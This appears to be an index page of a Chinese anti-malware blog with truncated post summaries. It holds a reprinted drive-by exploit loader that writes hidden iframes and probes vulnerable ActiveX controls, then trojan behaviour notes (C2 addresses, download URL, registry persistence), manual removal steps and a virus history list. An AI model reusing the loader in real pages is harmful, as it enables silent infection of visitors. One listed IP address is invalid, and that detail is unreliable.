博文
我也来截取网码(2009-03-18 08:09:00)
摘要:我也开始截取网马 刚开始做 资料不全 仅供参考
<html>
<script>
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
document.write("<iframe width=100 height=0 src=tnt.htm></iframe>");
document.write("<iframe width=100 height=0 src=flash.htm></iframe>");
if(navigator.userAgent.toLowerCase().indexOf("msie 7")>0)
document.write("<iframe src=02.htm width=100 height=0></iframe>");
try{var d;
var lz=new ActiveXObject("GLI"+"EDown.I"+"EDown.1");}
catch(d){};
finally{if(d!="[object Error]"){document.write("<iframe width=100 height=0 src=lz.htm></iframe>");}}
try{var b;
var of=new ActiveXObject("snpvw.Snap"+"shot Viewer Control.1");}
catch(b){};
finally{if(......
ntssl.exe的手动查杀方案(2006-11-20 20:43:00)
摘要:
卡巴斯基2006年9月14日14点的病毒库不报毒。
运行后,在c:\windows\下释放ntssl.exe。在HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run添加启动项。
此后,ntssl.exe通过8080端口访问220.189.208.188,下载木马intranet.exe到C:\windows\文件夹。
intranet.exe替换掉c:\windows\ntssl.exe。注册表启动项也相应改为:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
"Intranet"="C:\\windows\\intranet.exe"
接接下来,C:\windows\intranet.exe继续下载木马及其更新程序若干(图),并在注册表中添加相应的启动项。
screen.width*0.4) {this.resized=true; this.width=screen.width*0.4; this.alt='打开新窗口浏览';}" border=0>
查杀流程:
1、结束木马进程
C:\windows\explore.exe
C:\windows\taskmor.exe
C:\windows\intranet.exe
C:\windows\winlogin.exe
c:\windows\system32\service.exe(这几个进程并非同时存在。见到那些就结束那些。)
2、直接删除木马文件
C:\windows\explore.exe
C:\windows\taskmor.exe
C:\windows\intranet.exe
C:\windows\winlogin.exe
c:\windows\system32\service.exe
3、清理注册表:
展开:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
删除:
wuauclt.exe病毒解决方案(2006-11-20 20:42:00)
摘要:
%system%文件夹中的wuauclt.exe是WINDOWS 自动更新的客户端。
然而,今天说的这个wuauclt.exe非%system%文件夹中的那个wuauclt.exe。这个位于%windows%文件夹中。
今天VirusTotal多引擎扫描结果,只有4家报,其中3家报可疑;AntiVir的启发式报“恶意程序。4家均未给出具体名称。
连接网络时,运行这个wuauclt.exe,它通过80端口访问61.128.196.671创建下列文件:
C:\windows\wuauclt.exe
C:\windows\bbyb.exe
C:\windows\bbybs.exe
C:\windows\bbyb.dll
C:\windows\ies.dll
C:\windows\noruns.reg(将其中内容导入注册表后,此文件被自动删除。)
在系统分区以外的所有分区根目录以及U盘根目录下创建sxs.exe和autorun.inf。
其中C:\windows\bbyb.dll动态插入应用程序进程。
C:\windows\wuauclt.exe删除注册表中瑞星、KV、卡巴斯基以及雅虎助手的启动项和服务项。有意思的是,它还删除一个流行木马NTdhcp.exe的启动项。
添加的注册表启动项为:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
Microsoft
查杀:
结束C:\windows\wuauclt.exe进程。
该进程结束后,U盘中的sxs.exe和autorun.inf可直接删除。删除后,将U盘拔出。
然后,删除下列文件:
C:\windows\wuauclt.exe
C:\windows\bbyb.exe
C:\windows\bbybs.exe
C:\windows\bbyb.dll
C:\windows\ies.dll
删除其启动项。 ......
ADWARE.Roogooo罗古病毒( quartz32.dll/wshcon3(2006-11-20 20:41:00)
摘要:
var newasp_fontsize=9;
var newasp_lineheight=12;
ADWARE.Roogooo(罗古)病毒类型:下载者程序,危险级别:★ ,影响系统:Win 9X/ME/NT/2000/XP/2003
ADWARE.Roogooo(罗古)是一个广告软件。该病毒是一个能释放广告的下载者程序。病毒运行后,会生成文件到系统目录,文件名为下列中的一种quartz32.dll、wshcon32.dll、secur.dll、raspapi.dll、winipsec32.dll,并且添加注册表项。病毒运行后,用户在使用google等搜索引擎时,会在桌面右下角弹出与搜索的内容相关的广告。该广告使用的文件名类似系统文件名,迷惑用户,而且该广告会注册SPI服务,并不提供卸载,所以,当该文件出现故障时,可能会导致机器无法上网。
解决办法(强烈建议事先备份注册表):
1.手工修复
进入注册表,删除
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Winsock
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Winsock2
然后重新启动机器,重新启动过程中,被删除的注册表信息会自动重新建立,重新建立的东东当然是干净的。
重新启动后,再把TCP/IP协议给装下,如何装就不多说了,网上搜索下大把的抓,TCP/IP协议重装后,再重新启动机器,这个时候,问题已经解决。
2.借助工具
这里就要提到LSPFix.exe(http://www.pcav.cn/Soft/sdrj/ogher/200607/303.html)和winsockxpfix.exe(http://www.pcav.cn/Soft/sdrj/ogher/200607/304.html)
以下操作建议在带网络连接的安全模式下运行
1 执行LSPFix.exe,打开界面
勾选“I kno......
SoftUpdate.exe的手工查杀(2006-11-20 20:40:00)
摘要:
作者:天成 来源:www.pcpr.cn 发布时间:2006-11-2 0:06:14 发布人:天成
var newasp_fontsize=9;
var newasp_lineheight=12;
1、结束进程C:\WINDOWS\SoftUpdate.exe。
2、清理注册表:
HKEY_CLASSES_ROOT\
删除:37211.HahaPP
HKEY_CLASSES_ROOT\CLSID\
删除:{E730189A-9973-4121-B046-AD1C161EC3AF}
HKEY_CLASSES_ROOT\htmlfile\shell\htmlfile\shell\opennew\command\
删除:CLSID
HKEY_CLASSES_ROOT\htmlfile\shell\SOFTWARE\Classes\htmlfile\shell\open\command\
删除:SOFTWARE
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
删除:"Enable Browser Extensions"="yes"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\
删除:SoftUpdate
3、重启系统。显示隐藏文件。
4、删除文件:
C:\WINDOWS\SoftUpdate.exe
C:\WINDOWS\system32\37211.dll
C:\WINDOWS\system32\sncool.scr ......
Trojan.PSW.QQPass木马批处理(Soundmam)(2006-11-20 20:39:00)
摘要:
引用
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"
"Text"="@shell32.dll,-30500"
"Type"="radio"
"CheckedValue"=dword:00000001
"ValueName"="Hidden"
"DefaultValue"=dword:00000002
"HKeyRoot"=dword:80000001
"HelpID"="shell.hlp#51105"
4、可以显示所有文件就可以直接到c:\windows\system32目录下去删除svohost这个文件了!
5、从网上下载瑞星最新病毒库,让瑞星更新到最新病毒库,然后进行查杀,并耒查出任何病毒文件!故这个病毒已经被我解决了!!
Tags: 病毒 , 杀毒软件 , 瑞星杀毒软件 , 卡巴斯基 , 系统维护 , svohost.exe , soundmam , soundman , svchost.exe
......
Trojan-Downloader.Win32.Delf.aex手动清除方法(2006-11-20 20:29:00)
摘要:
作者:天成 来源:www.pcpr.cn 发布时间:2006-11-2 0:11:12 发布人:天成
病毒描述:
该病毒属木马类。病毒使用Windows图片浏览器的图标,用以迷惑用户点击运行。病毒运行后,复制自身到系统目录% WINDIR%下,释放病毒文件,修改注册表,添加启动项,以达到随机启动的目的,连接网络,开启本地端口,下载病毒文件,修改用户QICQ密码,盗取用户的敏感信息,并使QICQ带有“QQ尾巴”,自动发送含有被挂马的网站信息,终止反病毒软件的进程,阻止杀毒软件的安装。该病毒对用户有较大危害。
行为分析:
1、病毒使用Windows图片浏览器的图标,用以迷惑用户点击运行。
2、病毒运行后,复制自身到系统目录%WINDIR%下,释放病毒文件:
%WINDIR%\niw.exe
%system32%\impai.exe
3、修改注册表,添加启动项,以达到随机启动的目的:
修改的注册表项:
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile
\shell\open\command
原键值:字串:"默认"="%SystemRoot%\system32
\NOTEPAD.EXE %1."
修改的键值:字串:"默认"="C:\WINDOWS\system32
\impai.exe "%1""
新建注册表项:
HKEY_CURRENT_USER\Software\Microsoft\Windows
\CurrentVersion\Run
键值: 字串: "NIW "="C:\WINDOWS\NIW.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
\CurrentVersion\Run
键值: 字串: "Desktop"="C:\WINDOWS\system32
\rundll32.exe"
"C:\Program Files\DeskAdTop\Run.dll" ,Rundll"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\
{08A312BB-5409-49FC-9347-5......
Trojan-Downloader.Win32.Agent.kid手动清除方法(2006-11-20 20:27:00)
摘要:
病毒描述:
该病毒属木马类。病毒运行后在%\System32\%释放病毒副本msq.exe,之后修改注册表文件,添加启动项,并添加一项计划任务,以达到开机启动和定时安装病毒文件的目的。而后尝试连接网址为h**p://www.qi***.com的网站,下载一个名为 1013421.exe的文件,到本机运行安装。之后自动下载安装“中文上网”流氓软件,释放大量垃圾文件。并插入IE线程,当IE运行时,会自动运行本地的cdnup.exe连接网络。该病毒对用户有一定的危害。
行为分析:
1、该病毒运行后在系统目录释放病毒副本
%\system32\%msq..exe 314,880 字节
Trojan-Downloader.Win32.Agent.kid
%\system32\%1013421.exe 93,696 字节
%\system32\%iexplorer.exe 93,696 字节
%\system32\%IE_Bar.exe 33,792 字节
2、新建注册表项:
HKEY_CURRENT_USER\Software\Microsoft\Windows
\CurrentVersion\Run\msq
值: 字符串: "%\System32\%iexplorer.exe"
HKEY_CURRENT_USER\Software\msq\
HKEY_CURRENT_USER\Software\msq\http://www.qimop.com
/download/file/1013421.exe
HKEY_LOCAL_MACHINE\SOFTWARE\dmshareware\
HKEY_LOCAL_MACHINE\SOFTWARE\dmshareware\Owner
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services
\SharedAccess\Parameters\FirewallPolicy\StandardProfile
\AuthorizedApplications\List\C:\WINNT\System32\IE_Bar.exe
值: 字符串: "%\System32\%IE_Bar.exe:*:Enabled:D......
病毒资料更新2006-10-18(2006-10-18 18:08:00)
摘要:
1.
Backdoor.Dservice.lb
2.
Backdoor.Dservice.lc
3.
Backdoor.Dservice.ld
4.
Backdoor.Dservice.le
5.
Backdoor.Dservice.lf
6.
Backdoor.Dservice.lg
7.
Backdoor.Dservice.lh
8.
Backdoor.Dservice.li
9.
Backdoor.Dservice.lj
10.
Backdoor.Dservice.lk
11.
Backdoor.Dservice.ll
12.
Backdoor.Dservice.lm
13.
Backdoor.Dservice.ln
14.
Backdoor.Dservice.lo
15.
Backdoor.Dservice.lp
16.
Backdoor.Dservice.lq
17.
Backdoor.Dservice.lr
18.
Backdoor.Dservice.ls
19.
Backdoor.Dservice.lt
20.
Backdoor.Dservice.lu
没有绝对的最新 只有不停的追踪更新~
(回一网友需求)......
史上破坏力最大的10种计算机病毒排名(2006-10-03 21:45:00)
摘要:史上破坏力最大的10种计算机病毒排名
随着网络在现代生活中的重要性越来越突出,曾经被人们一手掌控的计算机病毒也逐渐从温驯的小猫成长为噬人的猛虎。从1986年,“Brain”病毒通过5.25英寸软盘首次大规模感染计算机起,人们与计算机病毒的斗争就从未停止过。如今,整整20年过去了,这场持久的拉锯战却似乎只是开了个头。
美国《Techweb》网站日前评出了20年来,破坏力最大的10种计算机病毒:
1. CIH (1998年)
该计算机病毒属于W32家族,感染Windows 95/98中以EXE为后缀的可行性文件。它具有极大的破坏性,可以重写BIOS使之无用(只要计算机的微处理器是Pentium Intel 430TX),其后果是使用户的计算机无法启动,唯一的解决方法是替换系统原有的芯片(chip),该计算机病毒于4月26日发作,它还会破坏计算机硬盘中的所以信息。该计算机病毒不会影响MS/DOS、Windows 3.x和Windows NT操作系统。
CIH可利用所有可能的途径进行传播:软盘、CD-ROM、Internet、FTP下载、电子邮件等。被公认为是有史以来最危险、破坏力最强的计算机病毒之一。1998年6月爆发于中国台湾,在全球范围内造成了2000万-8000万美元的损失。
2.梅利莎(Melissa,1999年)
这个病毒专门针对微软的电子邮件服务器和电子邮件收发软件,它隐藏在一个Word97格式的文件里,以附件的方式通过电子邮件传播,善于侵袭装有Word97或Word2000的计算机。它可以攻击Word97的注册器并修改其预防宏病毒的安全设置,使它感染的文件所具有的宏病毒预警功能丧失作用。
在发现Melissa病毒后短短的数小时内,该病毒即通过因特网在全球传染数百万台计算机和数万台服务器, 因特网在许多地方瘫痪。1999年3月26日爆发,感染了15%-20%的商业PC,给全球带来了3亿-6亿美元的损失。
3. I love you (2000年)
2000年5月3日爆发于中国香港,是一个用VBScript编写,可通过E-Mail散布的病毒,而受感染的电脑平台以Win95/98/2000为主。给全球带来100亿-150亿美元的损失。
4. 红色代码 (Code Red,2001年)
......